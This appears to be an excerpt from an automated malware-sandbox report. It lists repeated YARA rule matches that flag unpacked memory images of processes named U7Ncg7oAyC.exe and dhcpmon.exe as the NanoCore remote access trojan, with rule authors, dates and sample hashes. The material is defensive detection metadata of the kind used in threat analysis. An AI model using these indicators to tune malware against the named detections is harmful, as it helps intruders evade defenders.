        Source: 22.2.dhcpmon.exe.4e04cd0.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 22.2.dhcpmon.exe.4e04cd0.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 22.2.dhcpmon.exe.4e04cd0.11.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.2.dhcpmon.exe.3f307ce.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.dhcpmon.exe.3f307ce.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 34.2.dhcpmon.exe.3f307ce.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 19.2.U7Ncg7oAyC.exe.4444cd0.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.U7Ncg7oAyC.exe.4444cd0.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 19.2.U7Ncg7oAyC.exe.4444cd0.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 19.2.U7Ncg7oAyC.exe.4444cd0.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.2.dhcpmon.exe.2f49658.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.dhcpmon.exe.2f49658.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 34.2.dhcpmon.exe.2f49658.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 34.2.dhcpmon.exe.2f4e6b8.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.dhcpmon.exe.2f4e6b8.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 34.2.dhcpmon.exe.2f4e6b8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 0.2.U7Ncg7oAyC.exe.4ab9e90.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.U7Ncg7oAyC.exe.4ab9e90.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 0.2.U7Ncg7oAyC.exe.4ab9e90.9.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 30.2.U7Ncg7oAyC.exe.43307ce.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 30.2.U7Ncg7oAyC.exe.43307ce.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 30.2.U7Ncg7oAyC.exe.43307ce.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 6.2.U7Ncg7oAyC.exe.52c0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.U7Ncg7oAyC.exe.52c0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.2.U7Ncg7oAyC.exe.52c0000.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 34.2.dhcpmon.exe.3f3b041.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.dhcpmon.exe.3f3b041.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 34.2.dhcpmon.exe.3f3b041.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 30.0.U7Ncg7oAyC.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 30.0.U7Ncg7oAyC.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 30.0.U7Ncg7oAyC.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 30.0.U7Ncg7oAyC.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.2.U7Ncg7oAyC.exe.2aa4ef0.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.U7Ncg7oAyC.exe.2aa4ef0.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.2.U7Ncg7oAyC.exe.2aa4ef0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 6.2.U7Ncg7oAyC.exe.5160000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.U7Ncg7oAyC.exe.5160000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.2.U7Ncg7oAyC.exe.5160000.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 6.2.U7Ncg7oAyC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.U7Ncg7oAyC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.2.U7Ncg7oAyC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 6.2.U7Ncg7oAyC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.0.U7Ncg7oAyC.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.0.U7Ncg7oAyC.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.0.U7Ncg7oAyC.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 6.0.U7Ncg7oAyC.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 30.2.U7Ncg7oAyC.exe.433560b.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 30.2.U7Ncg7oAyC.exe.433560b.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 30.2.U7Ncg7oAyC.exe.433560b.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 30.2.U7Ncg7oAyC.exe.433560b.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.2.U7Ncg7oAyC.exe.3aa07ce.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.U7Ncg7oAyC.exe.3aa07ce.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.2.U7Ncg7oAyC.exe.3aa07ce.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 6.2.U7Ncg7oAyC.exe.3aa07ce.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.2.U7Ncg7oAyC.exe.4b24cd0.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.U7Ncg7oAyC.exe.4b24cd0.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0.2.U7Ncg7oAyC.exe.4b24cd0.11.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 0.2.U7Ncg7oAyC.exe.4b24cd0.11.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 30.2.U7Ncg7oAyC.exe.433b041.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 30.2.U7Ncg7oAyC.exe.433b041.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 30.2.U7Ncg7oAyC.exe.433b041.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 34.0.dhcpmon.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.0.dhcpmon.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 34.0.dhcpmon.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 34.0.dhcpmon.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.2.U7Ncg7oAyC.exe.3aa07ce.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.U7Ncg7oAyC.exe.3aa07ce.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.2.U7Ncg7oAyC.exe.3aa07ce.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 0.2.U7Ncg7oAyC.exe.4b24cd0.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.2.U7Ncg7oAyC.exe.4b24cd0.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0.2.U7Ncg7oAyC.exe.4b24cd0.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 0.2.U7Ncg7oAyC.exe.4b24cd0.11.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 30.0.U7Ncg7oAyC.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 30.0.U7Ncg7oAyC.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 30.0.U7Ncg7oAyC.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 30.0.U7Ncg7oAyC.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.dhcpmon.exe.4e04cd0.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.4e04cd0.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 22.2.dhcpmon.exe.4e04cd0.11.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 22.2.dhcpmon.exe.4e04cd0.11.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 24.2.dhcpmon.exe.43e04b0.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 24.2.dhcpmon.exe.43e04b0.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 24.2.dhcpmon.exe.43e04b0.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 24.2.dhcpmon.exe.43e04b0.9.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 24.2.dhcpmon.exe.4414cd0.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 24.2.dhcpmon.exe.4414cd0.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 24.2.dhcpmon.exe.4414cd0.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 24.2.dhcpmon.exe.4414cd0.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 30.2.U7Ncg7oAyC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 30.2.U7Ncg7oAyC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
